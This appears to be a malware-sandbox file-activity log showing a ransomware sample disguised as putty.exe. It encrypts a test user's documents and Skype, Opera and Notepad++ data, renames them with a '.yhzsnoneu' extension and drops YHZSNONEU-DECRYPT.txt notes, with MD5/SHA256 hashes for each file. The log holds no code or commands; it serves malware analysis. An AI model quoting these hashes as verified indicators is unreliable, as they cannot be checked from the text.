SHA256: f665a676b9c47ae429d06abdc5799195895cdc0ea67ba2ada287a262d12514f0
3020
putty.exe
C:\Users\admin\Desktop\twowomen.jpg.yhzsnoneu
binary
MD5: 2d184a10a6c217b62fce0d53a7e8571b
SHA256: 424d37adecc30d71ad8c2bd78e5638834a12bf85c3029ad5098dadde488c2a7e
3020
putty.exe
C:\Users\admin\Desktop\twowomen.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Desktop\policyface.rtf.yhzsnoneu
binary
MD5: 236a693c0f3255f8acf6b4a71c47886a
SHA256: e5dc79adb0d244b79bc1eb42f2d0ef5da0987c9552054faabb3e5ff8e58c3e43
3020
putty.exe
C:\Users\admin\Desktop\sawpack.rtf.yhzsnoneu
binary
MD5: 0284dc4ede247fcacd92f12550de0fd8
SHA256: 7faa25157ea7529630d775a30368465c11710e1e06240840254e305789ebb44a
3020
putty.exe
C:\Users\admin\Desktop\thuleading.png
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Desktop\sawpack.rtf
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Desktop\phasefeatures.jpg.yhzsnoneu
binary
MD5: 77771acd5ae0f8bde7e0514685d70bca
SHA256: 15ae7f2aefd595aa07f16e286fd710878688c2de85b09c41f073d316af9bd56d
3020
putty.exe
C:\Users\admin\Desktop\novs.rtf.yhzsnoneu
binary
MD5: 33f672bcdc624bfc453333554fda37ad
SHA256: b19865805ceeb4b47247ffcc60c5993166d609fae543879e29b3eac9cfeb87bb
3020
putty.exe
C:\Users\admin\Desktop\novs.rtf
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Desktop\policyface.rtf
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Desktop\phasefeatures.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Desktop\if.jpg.yhzsnoneu
binary
MD5: 6e2609375032ede30671192cbea5a519
SHA256: 64f20fc8f0bd9d711ef7a2b1174466d178eaebfb61f7c14bd36bbbdcf519c79d
3020
putty.exe
C:\Users\admin\Desktop\ipanti.jpg.yhzsnoneu
binary
MD5: efd04e6dc633c7f79ba9908390bc15ee
SHA256: 3945b45f57dc42f0e5032e1ddda034054f34f8be5c1d8c9e8aefbf42a7f4f0c7
3020
putty.exe
C:\Users\admin\Desktop\mendead.rtf.yhzsnoneu
binary
MD5: e04ff36a62040f985a2b09e67b4a86a4
SHA256: fd6d1a0cd74166c1be61d0053d40bd514f2e79ed9f2df31b8e02d30c14656338
3020
putty.exe
C:\Users\admin\Desktop\inputthread.rtf.yhzsnoneu
binary
MD5: 0442e66ecdccc7a4f1c8cc0c73607345
SHA256: 71d7b5f7aad7a2113b4a8e9d63fcf68d139ad8a64d566d53d8f25abf2309b2d1
3020
putty.exe
C:\Users\admin\Desktop\inputthread.rtf
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Desktop\mendead.rtf
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Desktop\if.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Desktop\ipanti.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Desktop\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\Contacts\admin.contact.yhzsnoneu
binary
MD5: b8b6ac1090c8e42b00d7e8a2d41d1503
SHA256: 7d84c80a3cbe49d46ed5d551bd6f1947ad5a8c91c53683b986381fc36caae9dd
3020
putty.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\Desktop\chinaway.png.yhzsnoneu
binary
MD5: a5c91d749b50739f9dc86b9c96983fe9
SHA256: 6589cfda870b4d31e37c85004a54354ce2ff8e0595ed57a0287675a81b440dcb
3020
putty.exe
C:\Users\admin\Desktop\animalalways.rtf.yhzsnoneu
binary
MD5: 66585ee120470482f767555c47e9d382
SHA256: b587cce54449a7f87720334205f8f5344fc9c0dd8356afe3bc5f1a59f7fefb8d
3020
putty.exe
C:\Users\admin\Desktop\chinaway.png
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Contacts\admin.contact
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\Desktop\animalalways.rtf
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\WinRAR\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\AppData\Roaming\WinRAR\version.dat.yhzsnoneu
binary
MD5: 4552cd07ee9a430686a1219715c46ea3
SHA256: e4c671a6f6c804b7eecd0f34a5e8be530719fff3120f1e11f128ad65ddd55f66
3020
putty.exe
C:\Users\admin\AppData\Roaming\Sun\Java\Deployment\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\AppData\Roaming\Sun\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\AppData\Roaming\Sun\Java\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\Contacts\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\AppData\Roaming\WinRAR\version.dat
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ul.conf.yhzsnoneu
binary
MD5: 46c658ee90d2aa8310dc602f0cb69c55
SHA256: 8cc8ce7b0dbf977b16d3656e730ec1ebc306c322a24702f46911219d38046343
3020
putty.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ul.conf
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\skypert.conf.yhzsnoneu
binary
MD5: e735822a54aa164e9cb32f3e236dbe5b
SHA256: 87ab41b96d7baef1d2d8e5bff9ee752ca27eeba6a350a25d7f01f09033b766b3
3020
putty.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ecs.conf.yhzsnoneu
binary
MD5: 8c69a180d328bd7adc2ecf1545909978
SHA256: fc59a1c5a167919adfec80f8a26e44dbf9fbbb8e231caac141e3684101964f3d
3020
putty.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ecs.conf
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\skypert.conf
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Skype\shared_httpfe\queue.db.yhzsnoneu
binary
MD5: 5a88d0b376b79135414a348a30c9eca2
SHA256: b1cf6c1a1ab62e72b12548a77e0d9aa2279c6466513662ff27f8c1cd4bc8db88
3020
putty.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\AppData\Roaming\Skype\shared_httpfe\queue.db
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Skype\shared_httpfe\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db-journal.yhzsnoneu
binary
MD5: 0b643959f0b648c34fd56f5fd8e12547
SHA256: 1be0a815a1e2a6225157adebfa955c8f4aeb93801e1e77aecc7f918e0bfaa819
3020
putty.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db-journal
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db.yhzsnoneu
binary
MD5: 8b74d13f2878330aaeb5efc28bbcd683
SHA256: f9df2cf3b13b0491c566b6a0aec3b36014e3cb15230df26928455377cdd1dde5
3020
putty.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Skype\shared.xml.yhzsnoneu
binary
MD5: e48be6f54c31d7bf23806accc5087062
SHA256: 17251027a69c3242e3e51fd7037b97bf1b68bf9e9db48a940a59924dd4a792dc
3020
putty.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\AppData\Roaming\Skype\shared.xml
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Skype\DataRv\offline-storage.data.yhzsnoneu
binary
MD5: a36f173dbb7fad7aa26ee15f75324cae
SHA256: cca003e40f65e033c3094057c78fa96fa0fa91683e6a7ce9379aef80ac5f81a9
3020
putty.exe
C:\Users\admin\AppData\Roaming\Skype\logs\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\AppData\Roaming\Skype\DataRv\offline-storage.data
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\users.xml.yhzsnoneu
binary
MD5: d0d31f4c64d97e9d72c1a0880776bb25
SHA256: 359a6faea6d14703d8c0fcf1d4399d8e8fce46a94f9bf3abe6f8361d0171fc73
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\vlink4.dat.yhzsnoneu
binary
MD5: b57cde2c4d149a277339d4fc1e740e12
SHA256: ee018a0dbdedea1cb8ddd9e69fdf6711c9f3b452a025758310b53ffc8768a43b
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\wand.dat.yhzsnoneu
binary
MD5: 9f17af903092317bdf2f07f0dcca0e2a
SHA256: 05fe5acc6196ac6f1d12049cfc95d004c24e05c1da695fcbb4b7583a4b397889
3020
putty.exe
C:\Users\admin\AppData\Roaming\Skype\DataRv\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\AppData\Roaming\Skype\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\wand.dat
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\users.xml
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\vlink4.dat
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\typed_history.xml.yhzsnoneu
binary
MD5: 29bd89ce36d3f087aaa677938b665047
SHA256: 1c65a1f60229e07a73c8feaf1e66867636655a2af76714e2f270c464cc6bd103
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\toc.css.yhzsnoneu
binary
MD5: b17b3544ee6e3f494c563bcb48b2ef91
SHA256: ded63e2dd885e3d7882bf77aa89aa35d4cfb8fa8d27b8be9ba90d17dca96a78f
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\tasks.xml.yhzsnoneu
binary
MD5: 279e52ccaff62d4dd5b4889a89435433
SHA256: 0e0825e1e25d097776d336bd297a4c645d37fc96e84ee60cc290a114728bacc9
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\tips.ini.yhzsnoneu
binary
MD5: 6be1ceb22edc55bc357542cff2adc991
SHA256: ed00bd0303753921a94ab0427d2d6e4a47486ff5a58a537cf6727e1e2b51cbb9
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\tasks.xml
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\toc.css
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\tips.ini
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\typed_history.xml
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structuretables.css.yhzsnoneu
binary
MD5: f65fa2f49a2a5ca3e4ac1b9da8c94118
SHA256: 72b9a103f1d66ba62daa7b3e88c64b32a51d0b491831809cfe689677e55c2739
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureinline.css.yhzsnoneu
binary
MD5: 686517ca160a2e684b8c9febfb6aa586
SHA256: de54cb333552ab1a169914bd37dc07fcf3a3f5ab943ad005e7df2d04959f4f5a
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\tablelayout.css.yhzsnoneu
binary
MD5: cf931535d78929a6f7cc71af47253154
SHA256: 50b9d07760a9aaa24562279af3defcd9a607f07f013ac0fca46bb9b8ff88e890
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\tablelayout.css
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structuretables.css
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureinline.css
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\outline.css.yhzsnoneu
binary
MD5: 51168f9cd99f2540b99e1dc0e4a8c60d
SHA256: 235fa83e362014f12787ceed8c53cd1987ba53ee7f786d6bef030d5528e25e9f
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disabletables.css.yhzsnoneu
binary
MD5: 5aa87df169e31612b6b8e650fa8a18dd
SHA256: 0d04d26a5139cfae18cd245503820f3d30898f6e8f5a65ed50b2c95941c8b44c
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureblock.css.yhzsnoneu
binary
MD5: a3a7688dbe831403a43657f834bee462
SHA256: fb3daade19d7c8239d61fe997d99ab8e50771cb74306c20ef5e769ac8eb035f4
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablepositioning.css.yhzsnoneu
binary
MD5: 9ab530d02865d64756b421628af081f9
SHA256: da5bc4ee479139ee56021344788a23d6dc69de3da804d58ab2fa778247ea54e2
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\outline.css
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablepositioning.css
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureblock.css
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disabletables.css
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disableforms.css.yhzsnoneu
binary
MD5: cc3615ed10f7ce2d7b73b59170a65da1
SHA256: 4282a7103d6247f67dafcbb8377cedc666a889c91d4158e784e5ae7c609c050a
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablefloats.css.yhzsnoneu
binary
MD5: 9ff121813c944272366d134617fbf735
SHA256: 5da7e7a559b2e2f9fd790b8d5e93a627f7fffd7d3be50baf8de7e24442622d84
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disableforms.css
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablefloats.css
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablebreaks.css.yhzsnoneu
binary
MD5: 28e368ebd6863b7bed1a0c9ad3f243ac
SHA256: b635fb0742641a47a1a0cf2b87324cea948ac46e9f4dd1962e0d3cda5bd75e78
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablebreaks.css
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastwb.css.yhzsnoneu
binary
MD5: 4bc8e4cba34e07b39c59e99d1b2f4802
SHA256: 44573f475f25ca3744d407bd8b84bf213ffb3869de584f07e492ddfe574ff4da
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastwb.css
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastbw.css.yhzsnoneu
binary
MD5: c2c69f697ce88e013710aabb7f2b2935
SHA256: 00b8e47dc8508182646ddb56b5f524132b4e621b3867d32cffe777f5ec225efb
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastbw.css
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\classid.css.yhzsnoneu
binary
MD5: 08a136cd8d1d9ac7cf0dce0699f92c51
SHA256: 88ef9ffa2675544a15242c994116b09402bc96dd8e9a0994dc6fa163c9851195
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\classid.css
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\altdebugger.css.yhzsnoneu
binary
MD5: b8b8c338a9bacf1a312abbb6c55aeda3
SHA256: 1e45a0d596ca04f87f9f27b50a4a6f12e32217cee4f252fb26032c16b1fe1b75
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\altdebugger.css
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\accessibility.css.yhzsnoneu
binary
MD5: b2b7cf7d1f2751466334453fb8f7807b
SHA256: d0d6f48d28486703fb1393560a67d956b5c7ac80d823325f73838851ba046004
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\accessibility.css
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\speeddial.ini.yhzsnoneu
binary
MD5: 758da07c3e9e74baee8aed9f35dc64a5
SHA256: a3227048a5f4a169178f3b45f109547ccac8e6e9ea888712c9e97d9312073555
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\speeddial.ini
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.bak.yhzsnoneu
binary
MD5: e94485a1667c5b74bc57592e4353aa0d
SHA256: aa7d7bdb4b3ac880b9dc53476a14092c50d4be4bc1917a515d842c28c4949652
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.bak
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.yhzsnoneu
binary
MD5: 3ece5fcadce44d6808855496a61ccd08
SHA256: cede2070637e104ce8f68e896f0c6cad1303f98e22f56b5bbf264fa64d8b3489
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opuntrust.dat.yhzsnoneu
binary
MD5: 1a08d7c38bb4077e0caeb9badd1fcf8e
SHA256: b5e7257948c64f4dd981b45e373638152cc97ebcc949783a2f60db256f31644f
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opuntrust.dat
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\optrust.dat.yhzsnoneu
binary
MD5: e4b7ebf6a70259ae3a214b4c781ff82b
SHA256: 4178357eb34cdc14e215da7edd7bb33522855b85156ca0c4e3ee16628a6f2048
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\optrust.dat
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opthumb.dat.yhzsnoneu
binary
MD5: 4e3ce73e32987fc1d1c4ce2e01c00c36
SHA256: 584d3d1352dee36267a4469caa35d8c122030a9f02369676bcdb59384bcdd1bf
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opthumb.dat
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opssl6.dat.yhzsnoneu
pic
MD5: 3cf2e0767baeeb5e5fdc89e7b3dd3b27
SHA256: d57b2c58558f2db79bf59e2aa7765b88c8b7e1dc59d006f1aafb7321b9ce3c8f
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opssl6.dat
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\oprand.dat.yhzsnoneu
binary
MD5: f151674aa592e023ef6d29b2fde9162e
SHA256: f4d2b92f7d9cf6aba8e7327eb3eb31a6b28f7a16b788339f5a418ddf5879eb71
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\oprand.dat
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opicacrt6.dat.yhzsnoneu
binary
MD5: e59fcf0a1dbf706ba5d8f050a19731ad
SHA256: c540432ffb3b316ac9f43cb512831ffce2cce38def38c88fc149fceea0727591
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opicacrt6.dat
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\operaprefs.ini.yhzsnoneu
binary
MD5: 95831319a07a0b506a4bc187d8ae22f3
SHA256: ce0ef6f33c9c20b04d151ba9a4747d5d823183462672873e95eec5313b20085b
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\operaprefs.ini
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcert6.dat.yhzsnoneu
binary
MD5: 668ba54dfc2d54c83ec4ec41e0ec81ae
SHA256: c34e216f5a6c98d8ab23420e04227aeb03c6b70d3b1e17f5a8000254d8cc89e7
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcert6.dat
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcacrt6.dat.yhzsnoneu
binary
MD5: 45810884cfa7270b969057eea7b0f2a3
SHA256: 4e2f500ca2284ac082b9146e358e2a614e2472c40ee724161f8c5ee89dd4cc23
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcacrt6.dat
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\handlers.ini.yhzsnoneu
binary
MD5: d0c6627fd0af018e6d845e2277f4477f
SHA256: 87aeb92525aae07a1c1284972dc3ff209adbfeb272222c65ddc3eb2447089963
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\handlers.ini
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\global_history.dat.yhzsnoneu
binary
MD5: 9a7819ddf84139251e4e2bda3e190bfd
SHA256: 107b346309eba479374d609ebb17cc98a1697697e62760a843d26d11936e2977
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\download.dat.yhzsnoneu
binary
MD5: 06fcb5df12ec28f2575ddbb4290a1d68
SHA256: df08bd298b99d91f42d723e6c48637755c3bd0e61c6b2b61d0f1fd89920cd5e2
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\global_history.dat
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\download.dat
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\cookies4.dat.yhzsnoneu
binary
MD5: 26616d9fe790b104f44703070be01497
SHA256: a600b33107efc9b5802b50d1ffe54b5a903e04877bba20e3a8ebc38ec8856a7c
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\cookies4.dat
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\bookmarks.adr.yhzsnoneu
binary
MD5: 2c0182f5021ba816f86749d635ce8039
SHA256: fd1dc15d8d216aef19b2f58eaeac18acf8392e933bbaccc56fd946562ae9d8d0
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\bookmarks.adr
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Zenburn.xml.yhzsnoneu
binary
MD5: 58a973d8e1ddcd6df2f8e64ce393287c
SHA256: 9638a017563d68395c68411ff809b71aaad9a5bfcf1df239a9f7ff16c0917171
3020
putty.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Zenburn.xml
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\vim Dark Blue.xml.yhzsnoneu
binary
MD5: 40544699f7a552089b73a4f18ad2c04b
SHA256: fe09bf21643a37497d109cb57803b9a0e5573257bf2d4d703cde51a01160d39a
3020
putty.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\vim Dark Blue.xml
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Vibrant Ink.xml.yhzsnoneu
ini
MD5: b2aaf02af3ac4fb5e312130d70ab2aea
SHA256: 67cacd755c0fff9f99776e2b490df00c6ca463d18820716afe10d239d1c93f18
3020
putty.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Vibrant Ink.xml
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Twilight.xml.yhzsnoneu
binary
MD5: 2358e8b87f7df258788f01489e058eb0
SHA256: ba674f3a6a5930235bb0e2ca6106b11401b7e39b5b565e4d11c8afdaec8803a7
3020
putty.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Twilight.xml
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized.xml.yhzsnoneu
binary
MD5: a5ebc6ed4054fe15b144477ad5be8c8d
SHA256: f90b6f9ed956644b29e12576a4d5543c206d9269278e14608514cfd436befc56
3020
putty.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized.xml
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized-light.xml.yhzsnoneu
binary
